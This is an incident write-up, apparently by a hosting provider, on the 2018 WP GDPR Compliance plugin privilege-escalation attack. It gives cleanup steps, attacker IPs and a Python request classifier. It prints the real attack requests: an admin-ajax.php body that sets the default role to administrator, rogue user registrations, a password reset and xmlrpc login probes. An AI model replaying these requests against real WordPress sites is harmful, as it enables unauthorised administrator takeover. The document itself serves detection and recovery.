Two days ago (on November 08 2018) a nasty WordPress exploit was identified in the popular WP GDPR Compliance plugin, which leads to privilege escalation.
The plugin has more than 100 000 active installations.
All versions prior to 1.4.3 are vulnerable to the exploit (1.4.3 itself is fixed).
What is the actual vulnerability?
More information about the vulnerability itself can be found here:
https://wpvulndb.com/vulnerabilities/9144
How to identify the attack?
The actual attack happens in several stages.
First, attackers try to enable site registrations and set the default role for new users to 'Administrator'.
This is done with a POST request to your wp-admin/admin-ajax.php.
The request looks like this (this is a real malicious request):
Host:XXXXXX.COM
Accept-Encoding:gzip
Content-Length:188
Content-Type:application/x-www-form-urlencoded
Referer:http://XXXXXX.COM/wp-login.php?action=rp
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
BODY: action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4
Second, attackers try to register a new user.
Most of the attacks in the wild try to register one of the following 2 users:
t2trollherten
t3trollherten
The real POST request looks like this:
Request_URI: http://XXXXXX.COM/wp-login.php?action=register
BODY:
redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register
Third (optional): trying to reset the user's password
We have seen some attempts by attackers to reset the malicious user's password.
The request looks like this:
Cookie: wordpress_test_cookie=WP+Cookie+check; path=/;wp-resetpass-464755d4cc9c2c0d7cc2b015eb2b7c0a=t2trollherten%3A76cnn4sryixU82wtCG9j; path=/wp-login.php; httponly;
URI: /wp-login.php?action=resetpass
BODY:
pass1=0rt8Ka7slborUi&pass1-text=0rt8Ka7slborUi&pass2=0rt8Ka7slborUi&rp_key=76cnn4sryixU82wtCG9j&wp-submit=Reset%2BPassword
At this point the attacker already has an administrator user created.
What malicious actions do attackers take after exploiting the website?
Different approaches have been reported, but most of the damage includes:
- Adding malicious administrator users to database
- Breaking websites by changing the "site_url" inside the WP settings, for black hat SEO
- Adding malicious cronjobs
- Infecting currently existing files with shells
- Uploads of new web shells in the website document root
- Adding crontab entries that reinfect the account
- Installing malicious WP plugins
Basically, at this stage (when the attacker has access to the account), they can do all kinds of harm.
How to clean the website after successful exploitation?
!!! Before making any recovery on your website, make sure you have updated WP GDPR Compliance to its latest fixed version – 1.4.3 !!!
1) Restore everything from a recent backup
This is the most effective action you can take to clean out your WP site.
We have traces of the attack starting from 08 November, so it would be best if you are able to restore your WordPress files + database from a date before 08 November.
In case you don't have any backup, you can try some of the next cures.
2) Search for newly added users in your database and remove them
Inside your db->wp_users table, you can search for newly created users.
So far, we have seen the following 2 users being actively injected into the database:
+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
| 20 | t2trollherten | $P$ByTG6qJi/eGVCRB2i.n/wS80Y967ng/ | t2trollherten | trollherten@mail.com | | 2018-11-08 13:43:38 | | 0 | t2trollherten |
| 21 | t3trollherten | $P$Bb7f2NV78UD2/nNpB6aKCStQnit99l1 | t3trollherten | t3trollherten@bk.ru | | 2018-11-08 15:58:44 | | 0 | t3trollherten |
+----+---------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+---------------+
Update:
Another user reported by Sucuri as a malicious one inserted into the database is "superuser".
3) Search for newly created files in your hosting account
If you have multiple sites residing in the same account, you had better search the whole account instead of just your hacked website directory.
You can try searching with find for files added in the last few days:
# This will search for files modified in the last 3 days (note: -mtime +3 would list files older than 3 days, which is the opposite of what we want).
find . -type f -mtime -3
4) Review your installed WordPress plugins for suspicious ones and delete them
Check if you have any suspicious newly installed WP plugins and remove them.
5) Check your system user cronjobs for suspicious ones
IP Addresses doing exploitation in the wild
Until now we have seen the following IP addresses exploiting the vulnerability in the wild:
109.234.39.250
109.234.37.214
46.39.65.176
195.123.213.91
UPDATE (13 Nov 2018)
Right now we are seeing a big wave of /xmlrpc.php requests that are trying to guess the passwords of the malicious users.
Attackers are trying to regain control over already infected websites.
The requests look like this:
URI: /xmlrpc.php
BODY:
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getProfile</methodName>
<params>
<param><value>9999</value></param>
<param><value>t2trollherten</value></param>
<param><value>0rt8Ka7slborUi</value></param>
</params>
</methodCall>
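The three request shapes shown above (the admin-ajax.php setting change, the wp-login.php registration, and the xmlrpc.php wp.getProfile probe), run through a small classifier suitable for a WAF or request-log hook. This is an added example, not code from the original post or the plugin; the KNOWN_USERS set, the classify function and its labels are my own assumptions, and the sample bodies are copied from the requests quoted above.

```python
import json
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import parse_qs

# Usernames observed in this campaign (taken from the post above).
KNOWN_USERS = {"t2trollherten", "t3trollherten", "superuser"}

# Sample request bodies, copied from the requests quoted in the post.
STAGE1_BODY = ("action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C"
               "%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22"
               "+%3A%22administrator%22%7D&security=1e35284ab4")
STAGE2_BODY = "redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register"
XMLRPC_BODY = ('<?xml version="1.0" encoding="iso-8859-1"?><methodCall>'
               "<methodName>wp.getProfile</methodName><params><param><value>9999</value></param>"
               "<param><value>t2trollherten</value></param><param><value>0rt8Ka7slborUi</value>"
               "</param></params></methodCall>")


def classify(uri: str, body: str) -> Optional[str]:
    """Label a request that matches a stage of the WP GDPR Compliance attack chain,
    or return None if nothing matched. The check is stage-specific on purpose."""
    if "admin-ajax.php" in uri:
        form = parse_qs(body)  # parse_qs also turns '+' into a space, as PHP does
        if form.get("action", [""])[0] != "wpgdprc_process_action":
            return None
        try:
            data = json.loads(form.get("data", ["{}"])[0])
        except json.JSONDecodeError:
            return "stage1: malformed wpgdprc data parameter"
        # The exploit abuses save_setting to flip registration/default role options.
        if data.get("type") == "save_setting" and data.get("option") in ("default_role", "users_can_register"):
            return "stage1: setting %s=%s" % (data.get("option"), data.get("value"))
    elif "wp-login.php" in uri and "action=register" in uri:
        login = parse_qs(body).get("user_login", [""])[0]
        if login in KNOWN_USERS:
            return "stage2: registration of known user %s" % login
    elif uri.endswith("/xmlrpc.php"):
        try:
            root = ET.fromstring(body)
        except ET.ParseError:
            return None
        values = [v.text or "" for v in root.iter("value")]
        if root.findtext("methodName") == "wp.getProfile" and any(v in KNOWN_USERS for v in values):
            return "update: xmlrpc wp.getProfile login attempt for known user"
    return None
```

Extend KNOWN_USERS with whatever accounts you find in wp_users; the option check in stage 1 fires regardless of the username, so it also catches variants that register a different account.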
Useful external resources
https://wordpress.org/support/topic/important-update-to-1-4-3-immediately/